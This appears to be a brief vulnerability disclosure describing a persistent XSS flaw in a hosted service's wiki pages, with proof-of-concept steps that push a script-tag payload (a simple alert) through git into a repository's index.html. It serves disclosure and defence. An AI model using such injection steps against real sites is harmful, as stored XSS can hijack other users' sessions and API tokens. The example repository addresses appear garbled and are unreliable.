There's a persistent cross-site scripting (XSS) vulnerability in the wiki pages. This can lead to an account take over via the leaked API token.
As an attacker, create a new public repository. Make sure you have a client that is allowed to push to that repository. For this PoC, lets say the repository is located at
email@example.com/dummy/test.git. On the client, execute the following commands:
git clone firstname.lastname@example.org/dummy/test.git cd test echo "<script>alert('Hello world!');</script>" > index.html git add index.html git commit -m "This message is super important" git push